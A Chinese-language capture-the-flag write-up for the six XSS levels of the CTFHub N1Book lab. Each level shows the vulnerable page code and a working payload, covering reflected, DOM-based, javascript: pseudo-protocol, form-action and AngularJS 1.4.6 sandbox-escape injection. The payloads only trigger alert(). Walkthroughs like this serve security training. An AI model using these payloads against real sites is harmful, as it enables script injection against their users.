CTFHub_N1Book-XSS闖關(XSS)
阿新 • • 發佈:2022-04-08
N1Book-第二章Web進階-XSS的魔力-XSS闖關
第一關
簡單的反射xss
前端程式碼
<div<span>welcome xss</span></div>
payload
/level1?username=xss<script>alert(1)</script> /level1?username=xss%3Csvg/onload=alert()
第二關
輸出點在script中,閉合好語句即可
前端程式碼
<script type="text/javascript"> if(location.search== ""){ location.search = "?username=xss" } var username = 'undefined'; document.getElementById('ccc').innerHTML= "Welcome " + escape(username); </script>
payload
/level2?username=xss';alert(1);//
第三關
domxss 使用者輸入將被js動態的寫入html中
前端程式碼
<script type="text/javascript"> if(location.search == ""){ location.search = "?username=xss" } var username = 'xss'; document.getElementById('ccc').innerHTML= "Welcome " + escape(username); </script>
payload
/level3?username=xss<img src=x onerror=alert``> /level3?username=xss<img src=x onerror=alert(1)/>
第四關
js跳轉帶來的xss 跳轉到偽協議
前端程式碼
<script type="text/javascript"> var time = 10; var jumpUrl; if(getQueryVariable('jumpUrl') == false){ jumpUrl = location.href; }else{ jumpUrl = getQueryVariable('jumpUrl'); } setTimeout(jump,1000,time); function jump(time){ if(time == 0){ location.href = jumpUrl; }else{ time = time - 1 ; document.getElementById('ccc').innerHTML= `頁面${time}秒後將會重定向到${escape(jumpUrl)}`; setTimeout(jump,1000,time); } } function getQueryVariable(variable) { var query = window.location.search.substring(1); var vars = query.split("&"); for (var i=0;i<vars.length;i++) { var pair = vars[i].split("="); if(pair[0] == variable){return pair[1];} } return(false); } </script>
payload
/level4?jumpUrl=javascript:alert()
第五關
表單自動提交 且action可控 控制表單提交到偽協議的地址
前端程式碼
<script type="text/javascript"> if(getQueryVariable('autosubmit') !== false){ var autoForm = document.getElementById('autoForm'); autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action'); autoForm.submit(); }else{ } function getQueryVariable(variable) { var query = window.location.search.substring(1); var vars = query.split("&"); for (var i=0;i<vars.length;i++) { var pair = vars[i].split("="); if(pair[0] == variable){return pair[1];} } return(false); } </script>
payload
/level5?action=javascript:alert()&autosubmit=1
第六關
angular.js 二次渲染導致的xss
前端程式碼
<html lang="zh"><head> <meta charset="UTF-8"> <title>XSS配套測試平臺</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <link rel="stylesheet" href="https://houtai.baidu.com/v2/csssdk"> <script type="text/javascript" src="main.js"></script> <script src="https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js"></script> <style> html, body, .app-wrapper { position: relative; width: 100%; height: 100%; margin: 0; padding: 0; } </style> </head> <body> <div id="root" class="app-wrapper amis-scope" ng-app=""><div class="amis-routes-wrapper"><div class="a-Toast-wrap a-Toast-wrap--topRight"></div><div class="a-Page"><div class="a-Page-content"><div class="a-Page-main"><div class="a-Page-header"><h2 class="a-Page-title"><span class="a-TplField">XSS test platform</span></h2></div><div class="a-Page-body"><span class="a-TplField">welcome xss</span></div></div></div></div></div></div> <script type="text/javascript"> if(location.search == ""){ location.search = "?username=xss" } </script> </body></html>
payload
/level6?username={{%27a%27.constructor.prototype.charAt=[].join;$eval(%27x=1} } };alert(1)//%27);}}
最終拿到flag